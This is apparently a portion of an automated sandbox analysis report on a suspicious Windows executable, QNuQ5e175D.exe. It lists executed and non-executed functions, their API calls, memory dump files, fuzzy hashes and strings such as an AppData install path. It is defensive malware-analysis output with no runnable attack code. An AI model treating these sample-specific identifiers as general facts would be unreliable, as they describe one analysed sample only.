                                                        APIs
                                                        • ShellExecuteExW.SHELL32(?), ref: 00405BAC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID:
                                                        • API String ID: 587946157-0
                                                        • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                        • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                        • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                        • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                        Function 00404518 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,004042EF), ref: 00404522
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                        • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                        • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                        • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                        Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                          • Part of subcall function 00406A16: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A27
                                                          • Part of subcall function 00406A16: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A49
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: a427765dcc854a3b2948ff8f1996ec0f646c6c24c00c8af56b9e51dc183c014b
                                                        • Instruction ID: 3bd5da99d2ff211530604a8704e688701187be5a7f5114c752edafe9c60b233e
                                                        • Opcode Fuzzy Hash: a427765dcc854a3b2948ff8f1996ec0f646c6c24c00c8af56b9e51dc183c014b
                                                        • Instruction Fuzzy Hash: 82F0F6329041119BDB20BBA18A895DE76A4CF00318F21803FE202B21C6CBBC4D41AB6E
                                                        Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 1ea5a5e12aa05b844e6b4a57a4a16afa5e1267f6842beefd722180d43813e619
                                                        • Instruction ID: 33bc48e2b41eb1a57acea8eab1ee3944d72ccc7503d83e75cfd502536df4b4aa
                                                        • Opcode Fuzzy Hash: 1ea5a5e12aa05b844e6b4a57a4a16afa5e1267f6842beefd722180d43813e619
                                                        • Instruction Fuzzy Hash: F9D0A773A146008BD744EBB8BE8549F73E8EB903293215C3BD102E10D1E778C901561C
                                                        Function 73B012BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAlloc.KERNELBASE(00000040,?,73B012DB,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012C5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: AllocGlobal
                                                        • String ID:
                                                        • API String ID: 3761449716-0
                                                        • Opcode ID: 2a29af8f57ea6cc03fbb069b789d45703d7bfec852381132aba474cdbd6b70a1
                                                        • Instruction ID: be89c57cd55f30a183b579b732db7876264c56c86f312110de4b4157266f0078
                                                        • Opcode Fuzzy Hash: 2a29af8f57ea6cc03fbb069b789d45703d7bfec852381132aba474cdbd6b70a1
                                                        • Instruction Fuzzy Hash: D3B012B26000009FFE10AB15DF4AF383254F710308F241000B608D3840E1208C008924

                                                        Non-executed Functions

                                                        Function 004049E7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                        • lstrcmpiW.KERNEL32(Call,0042CA68,00000000,?,?), ref: 00404B4E
                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404B5A
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                          • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • Part of subcall function 00406825: CharPrevW.USER32(?,?,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                          • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                          • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                          • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call
                                                        • API String ID: 2624150263-2762731361
                                                        • Opcode ID: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                        • Instruction ID: 819d6111372f9eb468737b2dc9595d459319e5efb98401d1644bfd8e85b56d65
                                                        • Opcode Fuzzy Hash: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                        • Instruction Fuzzy Hash: 14A180B1901208ABDB11EFA5DD45BAFB7B8EF84314F11803BF601B62D1D77C9A418B69
                                                        Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                        Strings
                                                        • C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres, xrefs: 0040228E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres
                                                        • API String ID: 542301482-3533886424
                                                        • Opcode ID: 99423ef168fa0dc7d563ab215b90f00d26a2448a52d76e49bcb10065e06d2d2e
                                                        • Instruction ID: 879178e2914a864b6efeea5842d2d3985b85c893096dfa9a9f6c7732eb85e553
                                                        • Opcode Fuzzy Hash: 99423ef168fa0dc7d563ab215b90f00d26a2448a52d76e49bcb10065e06d2d2e
                                                        • Instruction Fuzzy Hash: D1412571A00209AFCB00DFE4CA89A9D7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                        Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                        • Instruction ID: 26e9208e2aa2ebd90a7e98889f3239c7d6ed4a815a584e9a2b1206afb1357c73
                                                        • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                        • Instruction Fuzzy Hash: D1F08C71A04105AAD700EBE4EE499AEB378EF14324F20017BE112F31E5D7B89E509B2E
                                                        Function 00406DE6 Relevance: .3, Instructions: 334COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                        • Instruction ID: 02047a1f5ab1e1ae91636e32b2ea393de8a2dfbdc7c3bc720fead707395ef2b6
                                                        • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                        • Instruction Fuzzy Hash: 74E19A71A0470ADFCB24CF58C890BAABBF5FF44305F15852EE496A72D1E738AA51CB05
                                                        Function 004075BD Relevance: .3, Instructions: 300COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                        • Instruction ID: 0a97e2f3c77d8a3c51360fc4da6bbcda8fc4cde0dfaec3b210e24d05d93e5961
                                                        • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                        • Instruction Fuzzy Hash: 46C14872E042198BCF18DF68C4905EEB7B2BF88354F25866AD856B7380D734A942CF95
                                                        Function 00404F63 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                        • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                        • DeleteObject.GDI32(00000000), ref: 0040505D
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                        • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                        • GlobalFree.KERNEL32(?), ref: 0040539D
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                        • ShowWindow.USER32(?,00000000), ref: 00405547
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                        • ShowWindow.USER32(00000000), ref: 00405559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                        • Instruction ID: 2b71226c2ce540754c325362a134889399d6c5c4637dca841463e5b600fa6882
                                                        • Opcode Fuzzy Hash: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                        • Instruction Fuzzy Hash: 8802AD70900608AFDF20DFA8DD85AAF7BB5FB45314F10817AE611BA2E1D7798A41CF58
                                                        Function 004046B5 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                        • GetSysColor.USER32(?), ref: 00404795
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                        • lstrlenW.KERNEL32(?), ref: 004047B6
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                        • SendMessageW.USER32(00000000), ref: 00404838
